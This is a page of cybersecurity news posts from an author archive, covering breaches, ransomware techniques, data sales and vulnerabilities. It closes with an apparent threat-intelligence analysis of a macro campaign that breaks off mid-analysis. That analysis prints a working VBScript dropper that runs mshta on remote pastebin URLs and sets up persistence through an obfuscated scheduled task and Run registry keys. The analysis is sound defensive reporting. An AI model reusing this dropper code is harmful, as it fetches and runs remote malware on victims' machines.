Author Archives: Pierluigi Paganini

Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid

Threat actors are offering for sale more than two dozen SQL databases belonging to e-commerce websites for different countries.

Hackers are offering for sale more than two dozen SQL databases stolen from online shops from multiple countries.

Threat actors have compromised insecure servers exposed online and after copying the content of their websites they left a ransom note.

Some of the databases are dated as 2016, but data starts from March 28, 2020.

Crooks’ demand is BTC 0.06 ($485 at current price), they threaten to leak the content of the database if the victims don’t pay the ransom in 10 days.

The ransom notes observed in this campaign include a couple of wallets that received more than 100 transactions for a total of BTC 5.8 ($47,150 at current price).

“The number of abuse reports for these two wallets is over 200, the oldest being from September 20, 2019. The most recent one is from May 20 and this month alone there were nine reports, indicating that the actor is highly active.” reported BleepingComputer.

“It is important to note that the hacker may use more than the wallets found by BleepingComputer.”

The seller is offering 31 databases and gives a sample for the buyers to check the authenticity of the data.

Most of the listed databases are from online stores in Germany, others e-store hacked by threat actors are from Brazil, the U.S., Italy, India, Spain, and Belarus.

The hacked stores were running Shopware, JTL-Shop, PrestaShop, OpenCart, Magento v1 and v2 e-commerce CMSs.

The databases contain a total of 1,620,000 rows, exposed records include email addresses, names, hashed passwords (e.g. bcrypt, MD5), postal addresses, gender, dates of birth.

It isn’t the first time that crooks target unprotected databases, experts observed several attacks targeting unprotected MongoDB installs.

Pierluigi Paganini

(SecurityAffairs – SQL databases, hacking)

The post Crooks hacked e-shops and threaten to sell SQL databases if ransom not paid appeared first on Security Affairs.

Ragnar Ransomware encrypts files from virtual machines to evade detection

Ransomware encrypts from virtual machines to evade antivirus

Ragnar Locker deploys Windows XP virtual machines to encrypt victim’s files, the trick allows to evaded detection from security software.

Crooks always devise new techniques to evade detection, the Ragnar Locker is deploying Windows XP virtual machines to encrypt victim’s files while bypassing security measures.

The Ragnar Locker appeared relatively in the threat landscape, at the end of the 2019 it was employed in attacks against corporate networks. 

One of the victims of the ransomware is the energy giant Energias de Portugal (EDP), where the attackers claimed to have stolen 10 TB of files.

While many ransomware infections terminate security programs before encrypting,

This sample of Ragnar Locker terminates security programs and managed service providers (MSP) utilities to prevent them from blocking the attack.

“A new ransomware attack method takes defense evasion to a new level—deploying as a full virtual machine on each targeted device to hide the ransomware from view. In a recently detected attack, Ragnar Locker ransomware was deployed inside an Oracle VirtualBox Windows XP virtual machine.” reads the report published by Sophos. “The attack payload was a 122 MB installer with a 282 MB virtual image inside—all to conceal a 49 kB ransomware executable.”

The attack chain starts with the creation of a tool folder that includes VirtualBox, a mini Windows XP virtual disk called micro.vdi, which is an image of a stripped-down version of the Windows XP SP3 OS (MicroXP v0.82). The image includes the 49 kB Ragnar Locker ransomware executable, the attack also includes several executables and scripts to prep the environment.

Ragnar Locker ransomware

The malware leverage a VirtualBox feature that allows the host operating system to share folders and drives as a network share inside a virtual machine.  The virtual machine mounts the shared path as a network drive from the \\VBOXSVR virtual computer to access their content.

“In addition to the VirtualBox files, the MSI also deploys an executable (called va.exe), a batch file (named install.bat), and a few support files. After completing the installation, the MSI Installer executes va.exe, which in turn runs the install.bat batch script.” continues the analysis. “The script’s first task is to register and run the necessary VirtualBox application extensions VBoxC.dll and VBoxRT.dll, and the VirtualBox driver VboxDrv.sys.”

The install.bat batch file allows the threat to scan for local drives and mapped network drives on the host and builds a configuration file that automatically shares them with the virtual machine.

The script also prepares an sf.txt file containing VirtualBox configuration settings to automatically share all of the drives on the computer with the virtual machine.

The attackers launch the Windows XP virtual machine using the SharedFolder directives created by their batch file that are accessible within the virtual machine. and the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

When launched, all of these shared drives will now be accessible from within the virtual machine. Experts pointed you that the Ragnar Locker ransomware executable will automatically be present in the root of the C:\ drive.

Windows XP virtual machine
Windows XP virtual machine
(Source: Sophos)

Also included is a vrun.bat file that is located in the Startup folder so that it is launched immediately when the virtual machine starts.

This vrun.bat file, shown below, will mount each shared drive, encrypt it, and then proceed to the next drive shared with the virtual machine.

Mounting all the shared drives to encrypt
Mounting all the shared drives to encrypt

As the security software running on the victim’s host will not detect the ransomware executable or activity on the virtual machine, it will happily keep running without detecting that the victim’s files are now being encrypted.

It should be noted that if the victim was running Windows 10’s Controlled Folder Access anti-ransomware feature, it may have been protected from an attack like this as the operating system would have detected writes to the protected folders.

When done, the victim will find a custom ransom note on their computer explaining how their company was breached, and their files were encrypted.

Custom Ragnar Locker ransom note
(Source: Sophos)

The use of a virtual machine to encrypting a device’s files without being detected is an innovative approach.

As VirtualBox and a Windows XP virtual machine are not considered malicious, most security software will not be concerned that it is blissfully writing to all the data on the computer.

This attack illustrates how security software with behavioral monitoring is becoming more important to stem the tide of ransomware infections.

Only by detecting the unusual mass file writes, would this attack be detected.

Pierluigi Paganini

(SecurityAffairs – Ragnar Locker ransomware, hacking)

The post Ragnar Ransomware encrypts files from virtual machines to evade detection appeared first on Security Affairs.

Maze ransomware operators leak credit card data from Costa Rica’s BCR bank

Maze ransomware operators published credit card details stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Maze ransomware operators have released credit card data stolen from the Bank of Costa Rica (BCR) threatening to leak other lots every week.

Early May, Maze Ransomware operators claimed to have hacked the network of the state-owned Bank of Costa Rica Banco BCR and to have stolen internal data, including 11 million credit card credentials.

Banco BCR has equity of $806,606,710 and assets of $7,607,483,881, it is one of the most solid banks in Central America.

The hackers claim to have compromised the Banco BCR’s network in August 2019, and had the opportunity to exfiltrate its information before encrypting the files.

Maze Ransomware crew

According to Maze, the bank’s network remained unsecured at least since February 2020.

Anyway, the group explained that they did not encrypt the bank documents in February, because it “was at least incorrect during the world pandemic”.

The stolen data includes 4 million unique credit card records, and 140,000 allegedly belonging to USA citizens.

Now the Maze ransomware operators published a post on their leak site along with a spreadsheet (2GB in size) containing the payment card numbers from customers of Banco de Costa Rica (BCR).

MAze-BCR.jpg

The threat actors decided to leak the credit card number to lack of security measures implemented by the bank.

Security firm Cyble confirmed the data leak, over 2GB of data.

“Just like previously, the Cyble Research Team has verified the data leak, which consists of a 2GB CSV file containing details of various Mastercard and Visa credit cards or debit cards.” reads the post published by Cyble. “As per Cyble’s researchers, the Maze ransomware operators have made this data leak due to the Banco de Costa not taking the previous leaks seriously. Along with that, the Maze ransomware operators have threatened the BCR about this type of leak going to happen every week.”

Maze ransomware operators published screenshots showing unencrypted Visa or MasterCard credit card numbers, all the cards have been issued by BCR.

The BCR bank always denied that its systems have been hacked by the Maze gang.

“After multiple analyzes carried out by internal and external specialists in computer security, no evidence has been found to confirm that our systems have been violated. The permanent monitoring of our clients’ transactions confirms that none has been affected.” reads the last statement published by the bank.

Pierluigi Paganini

(SecurityAffairs – BCR, hacking)

The post Maze ransomware operators leak credit card data from Costa Rica’s BCR bank appeared first on Security Affairs.

3 hacking forums have been hacked and database have been leaked online

Three hacking forums Nulled.ch, Sinfulsite.com, and suxx.to have been hacked and their databases have been leaked online

Researchers from intelligence firm Cyble made the headlines again, this time they have discovered online the databases of three hacking forums. The three forums are Sinful SiteSUXX.TO and Nulled, they were all hacked.

These cybercrime forums are places of aggregations for hackers and cybercriminals, that could use them to participate in general discussion and sharing related resources.

hacking forums

Members of the forums share and sell data leaks, hacking tools, malware, tutorials, and much more. The databases appear to have been leaking in May 2020.

“Recently, the Cyble Research Team obtained the database leaks of these hacking forums which appear to have been leaking in May 2020. The Cyble’s researchers obtained-:

  • The databases of SUXX.TO and Nulled contains detailed information of their users, which appears to be dumped on 20 May 2020.
  • The full database of Sinful Site including the private messages, which appear to be dumped on 15 May 2020.

” reads the post published by security firm Cyble.

Cyble experts said that all the above databases have been indexed at AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – data breach, cyber crime forums)

The post 3 hacking forums have been hacked and database have been leaked online appeared first on Security Affairs.

25 million Mathway user records available for sale on the dark web

A threat actor is offering for sale on a dark web marketplace a database containing 25 million user records belonging to the Mathway.

A data breach broker, known as Shiny Hunters, is offering for sale on a dark web marketplace a database that contains 25 million user records for Mathway.

Early May, Shiny Hunters attempted to sell on a dark web marketplace databases containing more than 73.2 million user records from 11 different companies.

Shiny Hunters started offering the Tokopedia dump, then it began proposing 22 million user records for Unacademy and data allegedly obtained from the hack of the Microsoft’s GitHub account.

Recently the group has begun selling databases for the meal kit and food delivery company HomeChef, the photo print service ChatBooks, and Chronicle.com.

Mathway is a free math problem solver, from basic algebra to complex calculus, it instantly solves users’ math problems simply by typing their problem in (or point their camera and snap a pic!). Users will receive instant free answers through their website or mobile apps (both iOS and Android).

The Mathway app has over 10 million installs on Android Play Store and the Apple Store.

The dump was discovered by cyber intelligence firm Cyble, which confirmed that the archive was being sold in private sales in underground markets.

The Shiny Hunters group is offering for sale the Mathway database for $4,000.

Users’ records in the dump include email addresses and hashed passwords.

“We are aware of reports of a potential data compromise.  We are working with cybersecurity experts to investigate further, and will take the appropriate steps to ensure the security of customer information.” reads a statement published by Mathway.

Mathway is currently investigating the security breach, meantime its users should also change their password on the site and on any other site where they used the same credentials.

Mathway users could check if their account was impacted by the data breach by querying the Cyble’s AmIBreached data breach lookup service.

Pierluigi Paganini

(SecurityAffairs – Mathway, hacking)

The post 25 million Mathway user records available for sale on the dark web appeared first on Security Affairs.

Unc0ver is the first jailbreak that works on all recent iOS versions since 2014

A team of hackers and cyber-security researchers have released a new jailbreak package dubbed Unc0ver for iOS devices.

A team of cyber-security researchers and hackers have released a new jailbreak package dubbed Unc0ver (from the name of the team that devised it) that works on all recent iOS versions.devices, even those running the current iOS 13.5 release.

Jailbreaking an iOS mobile device it is possible to remove hardware restrictions implemented by the Apple’s operating system, Jailbreaking gives users root access to the iOS file system and manager, this allows them to download and install applications and themes from third-party stores.

By default, Apple does not allow users to have full control over their iPhones and other iOS devices, citing security reasons.

The Unc0ver team today released Unc0ver 5.0.0, the latest version of their jailbreak, which can root and unlock all iOS devices, even those running the latest iOS v13.5.

The jailbreak exploits a zero-day vulnerability in the iOS operating system that was discovered by Pwn20wnd, a member of the Unc0ver team, and that has yet to be addressed by Apple.

Pwn20wnd states that #unc0ver v5.0.0 will be a big milestone for jailbreaking because it is the first zero-day jailbreak released since iOS 8 that was released in September 2014.

Other jailbreak applications released since iOS 9 used 1-day exploits and and did not work on the current iOS version.

The new Unc0ver 5.0.0 jailbreak can be used from iOS, macOS, Linux, and Windows devices.

The Unc0ver team published instructions on their website.

“unc0ver is designed to be stable and enable freedom from the moment you jail​break your device. Built-in runtime policy softener allows running code without Apple’s notarization and pervasive restrictions.” reads the website.

“unc0ver Team strongly cautions against installing any iOS software update that breaks unc0ver as you can’t re-jail​break on versions of iOS that are not supported by unc0ver at that time.”

The Unc0ver team tested the jailbreak on iOS 11 through iOS 13.5, the software did not work on iOS versions 12.3 to 12.3.2 and 12.4.2 to 12.4.5.

What makes this jailbreak outstanding is that according to Pwn20wnd it doesn’t impact Apple’s iOS security features.

Let’s see when Apple will release security updates to address the zero-day vulnerability exploited by the Unc0ver team.

Pierluigi Paganini

(SecurityAffairs – Unc0ver, jailbreak)

The post Unc0ver is the first jailbreak that works on all recent iOS versions since 2014 appeared first on Security Affairs.

Coronavirus-themed attacks May 17 – May 23, 2020

This post includes the details of the Coronavirus-themed attacks launched from May 17 to May 23, 2020.

Threat actors exploit the interest in the Coronavirus outbreak while infections increase worldwide, experts are observing new campaigns on a daily bases.

Below a list of attacks detected this week.

May 19 – Hackers Target Oil Producers During COVID-19 Slump

Recent research shows that the oil industry — already experiencing difficulties due to COVID-19 — must remain abreast of threats to stay safe from hackers.

May 22 – Microsoft warns of “massive campaign” using COVID-19 themed emails

Experts from the Microsoft Security Intelligence team provided some details on a new “massive campaign” using COVID-19 themed emails.

May 23 – Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

If you are interested in COVID19-themed attacks from February 1 give a look at the following posts:

Pierluigi Paganini

(SecurityAffairs – COVID-19, hacking)

The post Coronavirus-themed attacks May 17 – May 23, 2020 appeared first on Security Affairs.

Security Affairs newsletter Round 265

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

Elexon, a middleman in the UK power grid network hit by cyber-attack
Experts reported the hack of several supercomputers across Europe
A bug in Edison Mail iOS app impacted over 6,400 users
FBI warns US organizations of ProLock ransomware decryptor not working
Mandrake, a high sophisticated Android spyware used in targeted attacks
Stored XSS in WP Product Review Lite plugin allows for automated takeovers
Texas Department of Transportation (TxDOT) hit by a ransomware attack
129 million records of Russian car owners available on the dark web
Australian product steel producer BlueScope hit by cyberattack
Bluetooth BIAS attack threatens billions of devices
Both Mirai and Hoaxcalls IoT botnets target Symantec Web Gateways
Easyjet hacked: 9 million customers data exposed along with 2,200+ credit card details
Hackers Target Oil Producers During COVID-19 Slump
Adobe fixed several memory corruption issues in some of its products
Israel is suspected to be behind the cyberattack on Iranian port
Researchers disclose five Microsoft Windows zero-days
Security Service of Ukraine arrested the popular hacker Sanix who sold billions of stolen credentials
Three flaws in Nitro Pro PDF reader expose businesses to hack
VMware fixes CVE-2020-3956 Remote Code Execution issue in Cloud Director
Iran-linked Chafer APT group targets governments in Kuwait and Saudi Arabia
Japan suspects HGV missile data leak in Mitsubishi security breach
Meal delivery service Home Chef discloses data breach
Santander, one of the biggest European banks, was leaking sensitive data on their website
Sophos blocked attacks exploiting XG Firewall zero-day to deploy Ransomware
Tens of thousands Israeli websites defaced
Cyber-Criminal espionage Operation insists on Italian Manufacturing
Experts found a Privilege escalation issue in Docker Desktop for Windows
Microsoft warns of massive campaign using COVID-19 themed emails
Winnti uses a new PipeMon backdoor in attacks aimed at the gaming industry
Experts observed a spike in COVID-19 related malspam emails containing GuLoader
Silent Night Zeus botnet available for sale in underground forums
The Florida Unemployment System suffered a data breach
Voter information for 2 millions of Indonesians leaked online

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 265 appeared first on Security Affairs.

Personal details and documents for millions of Indians available in the deep web

Researchers have discovered a dump containing 29.1M Indian jobseekers personal details that was offered for free in the hacking underground.

Researchers discovered a dump containing 29.1M Indian jobseekers personal details that was offered for free in the hacking underground.

An anonymous entity told Cyble researchers that the data were stored on an unprotected elastic search instance that is no longer accessible.

While Cyble was investigating the issue, a threat actor published more than 2,000 Indian Identity cards (Aadhaar cards) on one hacking forum, files appears to have originated from 2019.

Indian Identity card leak

Then the threat actor leaked 1.8M identity cards belonging to citizens of the Madhya Pradesh state on their forum.

“Cyble has indexed this information on their data breach monitoring and notification platform, Amibreached.com. People who are concerned about their information leakage, can ascertain the risks by registering to the platform.” reads the post published by Cyble.

Cyble researchers also discovered that a threat actor posted 2.3 GB (zipped) file on one of the hacking forums.

This time the leak contains a lot of personal details of millions of Indians Job seekers from different states. At the time of writing this article, the experts are still investigating the source of the leak.

“It appears to have originated from a resume aggregator given the sheer volume and detailed information.” state the experts.

“Cyble researchers have identified a sensitive data breach on the darkweb where an actor has leaked personal details of ~29 Million Indian Job Seekers from the various states. The original leak appears to be from a resume aggregator service collecting data from various known job portals. Cyble’s team is still investigating this further and will be updating their article as they bring more facts to the surface. This breach includes sensitive information such as email, phone, home address, qualification, work experience etc.”

Crooks could use personal information exposed in both data leaks to conduct various malicious activities, including identity thefts, scams, and corporate espionage.

Pierluigi Paganini

(SecurityAffairs – Indians data leaks, hacking)

The post Personal details and documents for millions of Indians available in the deep web appeared first on Security Affairs.

Online education site EduCBA discloses data breach and reset customers’ pwds

The online education portal EduCBA discloses a data breach and is resetting customers’ passwords in response to the incident.

Online education website EduCBA discloses a data breach, it has started notifying customers that in response to the incident it is resetting their passwords.

EduCBA is a leading global provider of skill based education with 500,000+ members across 40+ Countries. It offers 2500+ courses prepared by top-notch professionals from the Industry to help participants achieve their goals successfully. 

The company is notifying by email the incident to its customers confirming that their data have been accessed by an unauthorized party.

“Therefore, as a caution, we have invalidated passwords of all the users. You may retrieve your password here,” the data breach notification.

The data breach notification doesn’t include technical details about the attack, it only states that email, name, password, courses visited, etc may have been compromised.

The online education website states that no financial information was exposed as they use third-party processors such as PayPal and 2Checkout to process payments.

EduCBA data breach
Source BleepingComputer

As a precaution, EduCBA states that they have reset all user’s passwords.

As usual, customers that have used their EduCBA credentials at other sites have to change their passwords at these sites too.

Customers should remain vigilant of cyber attack, crooks may use their data to carry out spear-phishing attacks.

Pierluigi Paganini

(SecurityAffairs – EduCBA, hacking)

The post Online education site EduCBA discloses data breach and reset customers’ pwds appeared first on Security Affairs.

Experts observed a spike in COVID-19 related malspam emails containing GuLoader

Security experts observed a spike in the use of the GuLoader since March 2020 while investigating COVID-19-themed malspam campaigns.

Researchers from Vipre Labs observed a spike in the use of GuLoader in COVID-19-themed campaign since March 2020.

GuLoader

The discovery confirms that crooks continue to use COVID-19 lures in malspam campaigns. In the campaign monitored by Vipre Labs, attackers used spam email samples containing GuLoader.

The GuLoader is a popular RAT that appeared in the threat landscape in 2019 and that was involved in other COVID-19 campaigns, it is written in VB5/6 and compressed in a .rar/.iso file. 

GuLoader is usually employed in spam campaigns using bill payments, wire transfers or COVID lures.

In the last campaign observed by experts, the downloader utilizes cloud hosting services to keep the payload encrypted.

“This malware downloader utilizes cloud hosting services like Microsoft OneDrive or Google Drive to keep its payload encrypted. Also, GuLoader is used to download Remote Access Trojan (RAT) or files that allow attackers to control, monitor, or steal information on the infected machine.” reads the analysis.

The malware implements anti-analysis techniques, such as an anti-debugger. In order to achieve persistence, GuLoader creates a folder in which to place a copy of itself and modifies a registry key.

Now the loader implements process hollowing and use the child processes to download, decrypt, and map the payload into memory.

Common payloads downloaded by the loader are Formbook, NetWire, Remcos, Lokibot, and others.

The analysis published by Vipre Labs includes technical details about the threats, including Indicators of Compromise (IoCs).

In early March, experts at MalwareHunterTeam uncovered a COVID-19-themed campaign that was distributing the GuLoader malware to deliver the FormBook information-stealing Trojan.

The campaign was using emails that pretend to be sent by members of the World Health Organization (WHO).

Pierluigi Paganini

(SecurityAffairs – COVID-19, malspam)

The post Experts observed a spike in COVID-19 related malspam emails containing GuLoader appeared first on Security Affairs.

Voter information for 2 millions of Indonesians leaked online

A hacker has leaked the 2014 voter information for close to 2 million Indonesians on a well-known hacker forum and threatens to release 200 million.

A threat actor has published the 2014 voter information for close to 2 million Indonesians on a popular hacker forum and threatens to release data for a total of 200 million voters.

The dump includes voter records in individual PDF files that were allegedly stolen from the general election commission of Indonesia KPU.

According to intelligence firm Under the Breach, the PDFs were organized by Indonesia cities, threat actor leaks information on 2,300,000 Indonesian citizens. Leaked details include names, addresses, ID numbers, birth dates, and more, they appear to date back to 2013.

The KPU replied that the data was public information, it was available for anyone during the 2014 election. The KPU highlighted that its systems were not hacked.

Pierluigi Paganini

(SecurityAffairs – Indonesians, hacking)

The post Voter information for 2 millions of Indonesians leaked online appeared first on Security Affairs.

Silent Night Zeus botnet available for sale in underground forums

Experts reported the existence of a botnet, tracked as Silent Night based on the Zeus banking Trojan that is available for sale in several underground forums.

This week researchers from Malwarebytes and HYAS published a report that included technical details on a recently discovered botnet, tracked as Silent Night, being distributed via the RIG exploit kit and COVID-19 malspam campaign. 

Silent Night

The source code of the Zeus Trojan is available in the cybercrime underground since 2011 allowing crooks to develop their own release since.

Experts found multiple variants in the wild, many of them belonging to the Terdot Zbot/Zloader malware family.

The name “Silent Night” Zbot is likely a reference to a weapon mentioned in the 2002 movie xXx, it was first spotted in November 2019 when a seller named “Axe” started offering it on the Russian underground forum forum.exploit[.]in.

Axe was advertising the Trojan as the result of over five years of work, a total of 15k ~ hours were spent for the development of the malicious code.

“The author described it as a banking Trojan designed with compatibility with Zeus webinjects. Yet, he claims that the code is designed all by him, based on his multiple years of experience – quote: “In general, it took me 5+ years to develop and support the bot, on average about 15k ~ hours were spent.”.” reads the report published by the researchers.

The botnet goes for $4,000 per month for a custom build, $2,000 per month for a general build, while an extra for HVNC functionality is available for 1,000 USD/month and 14 days to test the code for 500 USD.

Experts believe that Axe is the developer of the Axe Bot 1.4.1, comparing Axe Bot 1.4.1 and Zloader 1.8.0 C2 source codes, experts noted that all of their custom PHP functions have the prefix CSR, which can either be a naming space or a developer’s handle

Silent Night is able to grab information from online forms and perform web injections in major browsers, including Google Chrome, Mozilla Firefox, and Internet Explorer, monitor keystrokes, take screenshots, harvest cookies and passwords.

Silent Night leverages web injections to hijack a user’s session and redirect them to malicious domains or to grab the login credentials for online banking services. Data collected by the malware are then transferred to the operator’s command-and-control (C2) server.

The malware is able to infect all operating systems.

The seller also claims to use an original obfuscator, the decryption is performed only “on demand.” The analysis of the content of an open directory on the Command and Control server allowed the researchers to discover a manual for bot operators that includes instructions for the set up of the malware.

On Dec 23 2019, this variant of Zloader was observed being distributed by the RIG Exploit Kit, experts observed small campaigns, likely for testing purposes. The spreading intensified over time, in March 2020, it was delivered in a COVID-19-themed spam campaign using weaponized Word documents.

“The design of Silent Night is consistent and clean, the author’s experience shows throughout the code. Yet, apart from the custom obfuscator, there is not much novelty in this product. The Silent Night is not any game changer, but just yet another banking Trojan based on Zeus.” concludes the report. “Based on the analysis of the bot’s configurations, we may confidently say that there is more than one customer of the “Silent Night”.”

Pierluigi Paganini

(SecurityAffairs – Silent Night, hacking)

The post Silent Night Zeus botnet available for sale in underground forums appeared first on Security Affairs.

The Florida Unemployment System suffered a data breach

Officials revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

The Florida Department of Economic Opportunity revealed that the Florida Unemployment System suffered a data breach that impacted some residents who have made unemployment claims.

It has notified 98 people that have been impacted by the incident, government representatives didn’t disclose when the breach took place either the number of the affected individuals and the type of information compromised.

The agency spokeswoman Paige Landrum announced that the breach was addressed within one hour after the officials became aware of it. The Florida Department of Economic Opportunity is offering tho the impacted citizens identity protection services for free.

Impacted users should be vigilant and report any unauthorized activity on their financial accounts.

“The DEO has received more than 2 million claims seeking unemployment benefits from Floridians since the coronavirus pandemic caused mass business closings around the state, though only 1.6 million claims have been verified.” reported the AP agency. “Just under 1 million jobless workers in Florida have been paid more than $2.6 billion in benefits.”

State Sen. Linda Stewart, D-Orlando, expressed concern about the response of the agency to the security breach and the measures it has adopted to prevent future incidents. Stewart sent a letter to Department of Management Services Secretary Jonathan Satter, whose office oversees information technology for other state agencies.

“Given the agency’s (DEO) track record with processing unemployment applications, I’m sure you will understand the great concern I have that all remedies have been quickly taken and that Floridians can be assured that their personal information is now secured and will be protected from future attacks,” Stewart wrote.

The good is that the Florida Department of Economic Opportunity is not aware of malicious activity abusing exposed data.

Pierluigi Paganini

(SecurityAffairs – Florida, hacking)

The post The Florida Unemployment System suffered a data breach appeared first on Security Affairs.

Experts found a Privilege escalation issue in Docker Desktop for Windows

A severe privilege escalation vulnerability, tracked as CVE-2020-11492, has been addressed in the Windows Docker Desktop Service. 

Cybersecurity researchers from Pen Test Partners publicly disclosed a privilege escalation vulnerability in the Windows Docker Desktop Service. 

The CVE-2020-11492 issue affects the way the service uses named pipes when communicating as a client to child processes. 

“Docker Desktop for Windows suffers from a privilege escalation vulnerability to SYSTEM.  The core of the issue lies with the fact that the Docker Desktop Service, the primary Windows service for Docker, communicates as a client to child processes using named pipes.” reads the analysis published by Pen Test Partners.

“The high privilege Docker Desktop Service can be tricked into connecting to a named pipe that has been setup by a malicious lower privilege process.  Once the connection is made, the malicious process can then impersonate the Docker Desktop Service account (SYSTEM) and execute arbitrary system commands with the highest level privileges.”

Experts discovered that the Docker Desktop Service can be tricked by attackers into connecting to a named pipe that has been set up by a malicious lower privilege process. Then the process can impersonate the Docker Desktop Service account and execute arbitrary commands with the highest privileges.

Upon installing Docker Desktop for Windows, a service called Docker Desktop Service is installed and runs by default, waiting for the Docker Desktop application to start.

Once the Docker software is started it will create several child processes to manage several functions such as process monitoring and image creation. Windows OS uses pipes for inter-process communication (IPC).

Named pipes could allow the server side of the connection to impersonate the client account who is connecting.  The impersonation functionality allows the service to drop its credentials in favour of the connecting client.  Experts pointed out that when restricted operating system functionalities and files are requested, the action is performed under the impersonated account and not the service account that the process was launched under.

This specific right is dubbed “Impersonate a client after authentication,” and is assigned to specific accounts by default including admin, network service, IIS App Pool, and Microsoft SQL Server Account.

“By default, services that are started by the Service Control Manager have the built-in Service group added to their access tokens. Component Object Model (COM) servers that are started by the COM infrastructure and that are configured to run under a specific account also have the Service group added to their access tokens. As a result, these services get this user right when they are started.” continues the post.

“Anything started by the Service Control Manager will automatically get the impersonation privilege, no matter which account is used to start the service.

Experts discovered that an attacker that is able to execute code under the context of a process with the above privileges, could set up a malicious pipe to compromise the software and elevate their privileges to system-level. 

Experts pointed out that attackers need Administrator rights to create such a service.

“Let’s say you happen to be hosting a vulnerable IIS Web Application on the same machine as Docker for Windows,” continues the analysis.”This could be one example of a successful attack vector. The initial attack vector could utilize a vulnerability in the web application to perform code execution under the limited IIS App Pool account.”

The researchers sent the details to the Docker security team on March 25, that initially said impersonation is a Windows feature and reported the issue to Microsoft.

Experts provided a Proof-of-Concept (PoC) to Docker that finally acknowledged it on April 1. 

On May 11, Docker released version 2.3.0.2 that addresses the vulnerability.

“After a few emails back and forth, then finally submitting a working PoC, Docker did agree that it was a security vulnerability and as such have now issued a fix.  When the Docker service process connects to the named pipes of spawned child processes it now uses the SecurityIdentification impersonation level.  This will allow the server end of the pipe to get the identity and privileges of the client but not allow impersonation.” Pen Test Partners concludes.

Pierluigi Paganini

(SecurityAffairs – Windows, hacking)

The post Experts found a Privilege escalation issue in Docker Desktop for Windows appeared first on Security Affairs.

Cyber-Criminal espionage Operation insists on Italian Manufacturing

ZLab researchers spotted a new malicious espionage activity targeting Italian companies operating worldwide in the manufacturing sector.

Introduction

During our Cyber Threat Intelligence monitoring we spotted new malicious activities targeting some Italian companies operating worldwide in the manufacturing sector, some of them also part of the automotive production chain.

The group behind this activity is the same we identified in the past malicious operations described in Roma225 (12/2018), Hagga (08/2019), Mana (09/2019), YAKKA (01/2020). This actor was first spotted by PaloAlto’s UNIT42 in 2018 during wide scale operations against technology, retail, manufacturing, and local government industries in the US, Europe and Asia. They also stated the hypothesis of possible overlaps with the Gorgon  APT group, but no clear evidence confirmed that.

However, in order to keep track of all of our report, we synthesized all the monitored campaigns, with their TTPs and final payload:

Table 1: Synthetic table of the campaigns

As we can see from the table, the Aggah campaigns varied in the time, but it maintained some common points. All campaigns used as the initial stage an office document (PowerPoint or Excel) armed with macro and some of them used injection methods. 

All attack operations used a “Signed Binary Proxy Execution” technique abusing Mshta, a legit Microsoft tool, and used at least an executable file for the infection. In addition, the use of PowerShell stage or the abuse of legit web service has been reported in some campaigns. 

Furthermore the CMSTP bypass exploit is a new feature present only in the 2020, because the first malwares identified to exploit this vulnerability all date back to mid/end 2019, making think the fact that the Threat Actor likes to test the latest disclosed exploits in order to make its campaigns always at the forefront. Regarding persistence mechanisms, we note that initially scheduled tasks were used, but in the latest infections the registry run keys were used. All threats use at least one obfuscation method to make the analysis harder. 

Looking at the evolution of the final payloads, we can say that this evolution is certainly due to a chronological factor, since Revenge rat had become obsolete, but the evolution is also due to the technological factor and its means: revenge rat has the classic functionality of spyware, while AZORult is considered an info stealer. As a last payload, Agent Tesla was used which collects all the functionality of the previous payloads as it is considered an info stealer and spyware.

Technical Analysis

The infection chain starts with a malicious Microsoft Powerpoint weaponized with a malicious macro.

Hash7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3
ThreatMalicious macro
Brief DescriptionMalicious ppt dropper with macro.
Ssdeep192:EFm9QiR1zQRZ0DfZGJjBVySCGVBdJWUpFVzsn6xVNdwWFj/WOvYoZLlmYvJuec9r:i8R1ERZ0DMJjU+bRuxURKMxpcksPY

Table 2. Sample information

The content of the macro is quite easy to read and the content is short and easy to read:

Figure 1: Content of the malicious macro

The VBA macro is responsible to download and execute malicious code retrieved from pastebin.  j[.mp is an url shortening service, the following request redirect and download a pastebin content:

Figure 2: Shortener resolution

The MSHTA Drop Chain

Like the previous campaigns, this threat actor uses a Signed Binary Proxy Execution (ID: T1218) technique abusing “mshta.exe” (T1170) a signed and legit Microsoft tool. Adversaries can use mshta.exe to proxy execution of malicious .hta files, Javascript or VBScript.

Figure 3: Piece of code of the Bnv7ruYp paste

As shown in the above figure, the code is simply URI encoded by replacing each instance of certain characters by one, two or three escape sequences representing the UTF-8 encoding of the character. 

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>’id1CreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\5CzmZ5NS”””
CreateObject(“WScript.Shell”).Run StrReverse(“/ 08 om/ ETUNIM cs/ etaerc/ sksathcs”) + “tn “”Pornhubs”” /tr “”\””mshta\””http:\\pastebin.com\raw\5CzmZ5NS”” /F “,0
‘id2CreateObject(“WScript.Shell”).RegWrite StrReverse(“TRATS\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\sJEBiiMw”””, “REG_SZ”‘id3CreateObject(“WScript.Shell”).RegWrite StrReverse(“\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\YL0je2fU”””, “REG_SZ”

‘defidCreateObject(“WScript.Shell”).Run “””mshta””””http:\\pastebin.com\raw\UyFaSxgj”””CreateObject(“WScript.Shell”).RegWrite StrReverse(“FED\nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS\UCKH”), “””m” + “s” + “h” + “t” + “a””””http:\\pastebin.com\raw\UyFaSxgj”””, “REG_SZ”

self.close</script>

Code Snippet 1

This stage acts as a dropper, in fact, it downloads and executes some pastebin contents through mshta.exe. 

Figure 4: Evidence of the NIBBI author

